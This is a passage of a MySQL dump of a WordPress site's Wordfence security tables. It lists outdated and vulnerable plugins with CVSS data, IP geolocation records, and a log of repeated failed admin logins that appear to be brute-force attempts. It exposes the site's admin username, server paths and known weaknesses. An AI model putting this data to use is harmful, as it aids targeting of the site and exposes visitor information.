Search\";s:9:\"AuthorURI\";s:24:\"https://ivorysearch.com/\";s:10:\"TextDomain\";s:18:\"add-search-to-menu\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:12:\"Ivory Search\";s:10:\"AuthorName\";s:12:\"Ivory Search\";s:10:\"pluginFile\";s:103:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/add-search-to-menu/add-search-to-menuh.php\";s:4:\"slug\";s:18:\"add-search-to-menu\";s:10:\"newVersion\";s:5:\"5.5.2\";s:5:\"wpURL\";s:48:\"https://wordpress.org/plugins/add-search-to-menu\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/5253fe2b-040b-417c-b257-0cb59ee5aa6e?source=plugin\";s:9:\"cvssScore\";s:3:\"6.1\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\";}'),
(8,1691937506,1691937506,'new','wfPluginUpgrade',50,'539680ff8b5616098b8a18c77a467118','539680ff8b5616098b8a18c77a467118','The Plugin \"Protect Uploads\" needs an upgrade (0.4 -> 0.5.2).','You need to upgrade \"Protect Uploads\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:15:\"Protect Uploads\";s:9:\"PluginURI\";s:53:\"https://wordpress.org/support/plugin/protect-uploads/\";s:7:\"Version\";s:3:\"0.4\";s:11:\"Description\";s:120:\"Protect your uploads directory. Avoid browsing of your uploads directory by adding a htaccess file or an index.php file.\";s:6:\"Author\";s:12:\"alticreation\";s:9:\"AuthorURI\";s:0:\"\";s:10:\"TextDomain\";s:15:\"protect-uploads\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:15:\"Protect Uploads\";s:10:\"AuthorName\";s:12:\"alticreation\";s:10:\"pluginFile\";s:96:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/protect-uploads/protect-uploads.php\";s:4:\"slug\";s:15:\"protect-uploads\";s:10:\"newVersion\";s:5:\"0.5.2\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/protect-uploads\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(9,1691937506,1691937506,'new','wfPluginUpgrade',50,'bdeb582baf27f13f37dab83b2d0d7171','bdeb582baf27f13f37dab83b2d0d7171','The Plugin \"Site Kit by Google\" needs an upgrade (1.96.0 -> 1.106.0).','You need to upgrade \"Site Kit by Google\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:18:\"Site Kit by Google\";s:9:\"PluginURI\";s:30:\"https://sitekit.withgoogle.com\";s:7:\"Version\";s:6:\"1.96.0\";s:11:\"Description\";s:125:\"Site Kit is a one-stop solution for WordPress users to use everything Google has to offer to make them successful on the web.\";s:6:\"Author\";s:6:\"Google\";s:9:\"AuthorURI\";s:29:\"https://opensource.google.com\";s:10:\"TextDomain\";s:15:\"google-site-kit\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"5.2\";s:11:\"RequiresPHP\";s:3:\"5.6\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:18:\"Site Kit by Google\";s:10:\"AuthorName\";s:6:\"Google\";s:10:\"pluginFile\";s:96:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/google-site-kit/google-site-kit.php\";s:4:\"slug\";s:15:\"google-site-kit\";s:10:\"newVersion\";s:7:\"1.106.0\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/google-site-kit\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(10,1691937506,1691937506,'new','wfPluginUpgrade',50,'62fcb79de9655925cb117b12e9b54b64','62fcb79de9655925cb117b12e9b54b64','The Plugin \"White Label CMS\" needs an upgrade (2.5 -> 2.6).','You need to upgrade \"White Label CMS\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:15:\"White Label CMS\";s:9:\"PluginURI\";s:108:\"https://www.videousermanuals.com/white-label-cms/?utm_campaign=wlcms&utm_medium=plugin&utm_source=readme-txt\";s:7:\"Version\";s:3:\"2.5\";s:11:\"Description\";s:59:\"A plugin that allows you to brand WordPress CMS as your own\";s:6:\"Author\";s:24:\"www.videousermanuals.com\";s:9:\"AuthorURI\";s:92:\"https://www.videousermanuals.com/?utm_campaign=wlcms&utm_medium=plugin&utm_source=readme-txt\";s:10:\"TextDomain\";s:15:\"white-label-cms\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:15:\"White Label CMS\";s:10:\"AuthorName\";s:24:\"www.videousermanuals.com\";s:10:\"pluginFile\";s:93:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/white-label-cms/wlcms-plugin.php\";s:4:\"slug\";s:15:\"white-label-cms\";s:10:\"newVersion\";s:3:\"2.6\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/white-label-cms\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(11,1691937506,1691937506,'new','wfPluginUpgrade',50,'9b9b387ed038af08cd272c503042e5d5','9b9b387ed038af08cd272c503042e5d5','The Plugin \"WP File Manager\" needs an upgrade (7.1.8 -> 7.1.9).','You need to upgrade \"WP File Manager\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:15:\"WP File Manager\";s:9:\"PluginURI\";s:45:\"https://wordpress.org/plugins/wp-file-manager\";s:7:\"Version\";s:5:\"7.1.8\";s:11:\"Description\";s:21:\"Manage your WP files.\";s:6:\"Author\";s:12:\"mndpsingh287\";s:9:\"AuthorURI\";s:43:\"https://profiles.wordpress.org/mndpsingh287\";s:10:\"TextDomain\";s:15:\"wp-file-manager\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:15:\"WP File Manager\";s:10:\"AuthorName\";s:12:\"mndpsingh287\";s:10:\"pluginFile\";s:100:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/wp-file-manager/file_folder_manager.php\";s:4:\"slug\";s:15:\"wp-file-manager\";s:10:\"newVersion\";s:5:\"7.1.9\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/wp-file-manager\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(13,1691937506,1691937506,'new','wfPluginUpgrade',100,'06de08f21a6c865a1a81aab80fdcaa4b','06de08f21a6c865a1a81aab80fdcaa4b','The Plugin \"WPBakery Page Builder\" needs an upgrade (6.10.0 -> 7.0).','You need to upgrade \"WPBakery Page Builder\" to the newest version to ensure you have any security fixes the developer has released.','a:27:{s:7:\"Package\";s:0:\"\";s:4:\"Name\";s:21:\"WPBakery Page Builder\";s:9:\"PluginURI\";s:19:\"http://wpbakery.com\";s:7:\"Version\";s:6:\"6.10.0\";s:11:\"Description\";s:157:\"Drag and drop page builder for WordPress. Take full control over your WordPress site, build any layout you can imagine – no programming knowledge required.\";s:6:\"Author\";s:24:\"Michael M - WPBakery.com\";s:9:\"AuthorURI\";s:19:\"http://wpbakery.com\";s:10:\"TextDomain\";s:11:\"js_composer\";s:10:\"DomainPath\";s:8:\"/locale/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"4.9\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:21:\"WPBakery Page Builder\";s:10:\"AuthorName\";s:24:\"Michael M - WPBakery.com\";s:10:\"pluginFile\";s:88:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/js_composer/js_composer.php\";s:4:\"slug\";s:11:\"js_composer\";s:10:\"newVersion\";s:3:\"7.0\";s:5:\"wpURL\";s:0:\"\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/78579ed9-1540-44be-9884-51fc2afec2bd?source=plugin\";s:9:\"cvssScore\";s:3:\"6.4\";s:13:\"severityColor\";s:7:\"#f9a009\";s:13:\"severityLabel\";s:6:\"Medium\";s:13:\"severityClass\";s:32:\"wf-vulnerability-severity-medium\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\";}'),
(14,1691937506,1691937506,'new','wfPluginUpgrade',50,'8ab859842da88512c5b3b0eef35d68c7','8ab859842da88512c5b3b0eef35d68c7','The Plugin \"Ultimate Addons for WPBakery Page Builder\" needs an upgrade (3.19.11 -> 3.19.15).','You need to upgrade \"Ultimate Addons for WPBakery Page Builder\" to the newest version to ensure you have any security fixes the developer has released.','a:21:{s:7:\"Package\";s:4:\"the7\";s:4:\"Name\";s:41:\"Ultimate Addons for WPBakery Page Builder\";s:9:\"PluginURI\";s:43:\"https://brainstormforce.com/demos/ultimate/\";s:7:\"Version\";s:7:\"3.19.11\";s:11:\"Description\";s:223:\"Includes WPBakery Page Builder premium addon elements like Icon, Info Box, Interactive Banner, Flip Box, * Info List & Counter. Best of all - provides A Font Icon Manager allowing users to upload / delete custom icon fonts.\";s:6:\"Author\";s:16:\"Brainstorm Force\";s:9:\"AuthorURI\";s:31:\"https://www.brainstormforce.com\";s:10:\"TextDomain\";s:11:\"ultimate_vc\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:41:\"Ultimate Addons for WPBakery Page Builder\";s:10:\"AuthorName\";s:16:\"Brainstorm Force\";s:10:\"pluginFile\";s:102:\"D:/Inetpub/vhosts/hled-eg.com/gsw2023.com/wp-content/plugins/Ultimate_VC_Addons/Ultimate_VC_Addons.php\";s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:10:\"newVersion\";s:7:\"3.19.15\";s:5:\"wpURL\";s:0:\"\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),
(17,1691937506,1691937506,'new','wfThemeUpgrade',50,'21bc64645c920daebe0161d7ed42566b','21bc64645c920daebe0161d7ed42566b','The Theme \"ConsultStreet\" needs an upgrade (2.3.9 -> 2.5.0).','You need to upgrade \"ConsultStreet\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.5.0\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/consultstreet.2.5.0.zip\";s:3:\"URL\";s:43:\"https://wordpress.org/themes/consultstreet/\";s:4:\"Name\";s:13:\"ConsultStreet\";s:4:\"name\";s:13:\"ConsultStreet\";s:7:\"version\";s:5:\"2.3.9\";s:10:\"vulnerable\";b:0;}'),
(18,1691937506,1691937506,'new','wfThemeUpgrade',50,'f8f1580ca130325f69af178047784498','f8f1580ca130325f69af178047784498','The Theme \"Twenty Twenty-Three\" needs an upgrade (1.1 -> 1.2).','You need to upgrade \"Twenty Twenty-Three\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.2\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.2.zip\";s:3:\"URL\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:4:\"Name\";s:19:\"Twenty Twenty-Three\";s:4:\"name\";s:19:\"Twenty Twenty-Three\";s:7:\"version\";s:3:\"1.1\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `dnctiavkr_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wfknownfilelist`
--

DROP TABLE IF EXISTS `dnctiavkr_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  `wordpress_path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wfknownfilelist`
--

LOCK TABLES `dnctiavkr_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wfknownfilelist` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wflivetraffichuman`
--

DROP TABLE IF EXISTS `dnctiavkr_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wflivetraffichuman`
--

LOCK TABLES `dnctiavkr_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wflocs`
--

DROP TABLE IF EXISTS `dnctiavkr_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wflocs`
--

LOCK TABLES `dnctiavkr_wflocs` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wflocs` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wflocs` VALUES
('\0\0\0\0\0\0\0\0\0\0\"',1691937610,0,'Council Bluffs','Iowa','United States','US',41.2591019,-95.8516998),
('\0\0\0\0\0\0\0\0\0\0\'iF',1691941455,0,'Beijing','Beijing','China','CN',39.9109993,116.3949966),
('\0\0\0\0\0\0\0\0\0\0+h',1691941455,0,'Hong Kong','Central and Western District','Hong Kong','HK',22.2842007,114.1759033),
('\0\0\0\0\0\0\0\0\0\03Y*',1691937638,0,'London','England','United Kingdom','GB',51.5088005,-0.0930000),
('\0\0\0\0\0\0\0\0\0\0AY',1691938488,0,'Mumbai','Maharashtra','India','IN',19.0748005,72.8855972),
('\0\0\0\0\0\0\0\0\0\0PPԪ',1691941455,0,'','','Uzbekistan','UZ',41.6666985,63.8333015),
('\0\0\0\0\0\0\0\0\0\0Yj7',1691941455,0,'Amsterdam','North Holland','Netherlands','NL',52.3759003,4.8975000),
('\0\0\0\0\0\0\0\0\0\0]r',1691941455,0,'','','United Kingdom','GB',51.4963989,-0.1224000),
('\0\0\0\0\0\0\0\0\0\0g\Z',1691941455,0,'','Maharashtra','India','IN',18.9720993,72.8246002),
('\0\0\0\0\0\0\0\0\0\0gH',1691938886,0,'Los Angeles','California','United States','US',34.0544014,-118.2441025),
('\0\0\0\0\0\0\0\0\0\0g\"',1691941455,0,'','','India','IN',21.9974003,79.0010986),
('\0\0\0\0\0\0\0\0\0\0z|<',1691941455,0,'','','Australia','AU',-33.4939995,143.2104034),
('\0\0\0\0\0\0\0\0\0\0|',1691941455,0,'','','China','CN',34.7732010,113.7220001),
('\0\0\0\0\0\0\0\0\0\0>',1691941455,0,'New Taipei','New Taipei','Taiwan','TW',24.9466000,121.5859985),
('\0\0\0\0\0\0\0\0\0\0&',1691937514,0,'Santa Clara','California','United States','US',37.3417015,-121.9753036),
('\0\0\0\0\0\0\0\0\0\0d',1691938488,0,'Düsseldorf','North Rhine-Westphalia','Germany','DE',51.2183990,6.7733998),
('\0\0\0\0\0\0\0\0\0\0#',1691941455,0,'Santa Clara','California','United States','US',37.3931007,-121.9619980),
('\0\0\0\0\0\0\0\0\0\0a',1691941455,0,'Düsseldorf','North Rhine-Westphalia','Germany','DE',51.1878014,6.8607001),
('\0\0\0\0\0\0\0\0\0\0\rgS',1691941455,0,'','','United Kingdom','GB',51.4963989,-0.1224000),
('\0\0\0\0\0\0\0\0\0\0%.',1691938886,0,'','','United States','US',37.7509995,-97.8219986),
('\0\0\0\0\0\0\0\0\0\0,',1691941455,0,'','','United States','US',37.7509995,-97.8219986),
('\0\0\0\0\0\0\0\0\0\0 ',1691937610,0,'Tappahannock','Virginia','United States','US',37.9272995,-76.8544998),
('\0\0\0\0\0\0\0\0\0\0Y',1691941455,0,'Ashburn','Virginia','United States','US',39.0469017,-77.4903030),
('\0\0\0\0\0\0\0\0\0\0(',1691938488,0,'','','Germany','DE',51.2993011,9.4910002),
('\0\0\0\0\0\0\0\0\0\0#',1691941455,0,'','','Hong Kong','HK',22.2577991,114.1657028),
('\0\0\0\0\0\0\0\0\0\0e<',1691938527,0,'Brandenburg','Brandenburg','Germany','DE',52.6170998,13.1206999),
('\0\0\0\0\0\0\0\0\0\0D/6',1691941455,0,'Ebstorf','Lower Saxony','Germany','DE',53.0255013,10.4071999),
('\0\0\0\0\0\0\0\0\0\0*t',1691938534,0,'','','Netherlands','NL',52.3824005,4.8994999),
('\0\0\0\0\0\0\0\0\0\0#',1691938505,0,'Eygelshoven','Limburg','Netherlands','NL',50.8897018,6.0563002),
('\0\0\0\0\0\0\0\0\0\0£C',1691938886,0,'Düsseldorf','North Rhine-Westphalia','Germany','DE',51.1878014,6.8607001),
('\0\0\0\0\0\0\0\0\0\0d',1691938488,0,'','','Canada','CA',43.6319008,-79.3715973),
('\0\0\0\0\0\0\0\0\0\0՘',1691941455,0,'Haarlem','North Holland','Netherlands','NL',52.3890991,4.6563001);
/*!40000 ALTER TABLE `dnctiavkr_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_wflogins`
--

DROP TABLE IF EXISTS `dnctiavkr_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=70 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_wflogins`
--

LOCK TABLES `dnctiavkr_wflogins` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_wflogins` DISABLE KEYS */;
INSERT INTO `dnctiavkr_wflogins` VALUES
(1,3,1691937492.278219,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(2,3,1691937492.285948,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(3,4,1691937494.360049,1,'loginFailInvalidUsername','111111',0,'\0\0\0\0\0\0\0\0\0\0&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(4,6,1691937641.479339,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\03Y*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(5,7,1691937643.871562,1,'loginFailInvalidUsername','svmhssadmin',0,'\0\0\0\0\0\0\0\0\0\03Y*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(6,9,1691937801.216596,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(7,10,1691937803.598192,1,'loginFailInvalidUsername','temp-admin',0,'\0\0\0\0\0\0\0\0\0\0(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(8,12,1691937979.873513,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(9,13,1691937981.896514,1,'loginFailInvalidUsername','dungovt',0,'\0\0\0\0\0\0\0\0\0\0d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(10,16,1691938203.957395,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(11,17,1691938205.615641,1,'loginFailInvalidUsername','Administrator',0,'\0\0\0\0\0\0\0\0\0\0d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(12,19,1691938354.896994,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(13,20,1691938357.267248,1,'loginFailInvalidUsername','triple8mgmt',0,'\0\0\0\0\0\0\0\0\0\0AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(14,21,1691938503.144600,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(15,22,1691938512.925936,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(16,23,1691938523.859788,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0e<','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(17,24,1691938528.050421,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0*t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(18,25,1691938530.295329,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0*t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(19,27,1691938682.244266,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0£C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(20,28,1691938684.208085,1,'loginFailInvalidUsername','landingadmin',0,'\0\0\0\0\0\0\0\0\0\0£C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(21,30,1691938857.803701,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0gH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(22,31,1691938859.564619,1,'loginFailInvalidUsername','helpbot',0,'\0\0\0\0\0\0\0\0\0\0gH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(23,34,1691939064.563323,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0]r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(24,35,1691939066.945481,1,'loginFailInvalidUsername','aybeniz',0,'\0\0\0\0\0\0\0\0\0\0]r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(25,37,1691939243.076580,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(26,38,1691939245.245568,1,'loginFailInvalidUsername','rubin',0,'\0\0\0\0\0\0\0\0\0\0,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(27,39,1691939347.376441,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),
(28,41,1691939608.869934,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(29,42,1691939614.417384,1,'loginFailInvalidUsername','shown',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(30,43,1691939725.825259,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(31,44,1691939726.622359,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0PPԪ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(32,45,1691939728.460584,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(33,46,1691939731.353871,1,'loginFailInvalidUsername','indocoffeenetwork',0,'\0\0\0\0\0\0\0\0\0\0PPԪ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(34,47,1691939732.325539,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(35,48,1691939735.000487,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0Yj7','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),
(36,49,1691939737.529452,1,'loginFailValidUsername','admin_gsw23',1,'\0\0\0\0\0\0\0\0\0\0Yj7','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),
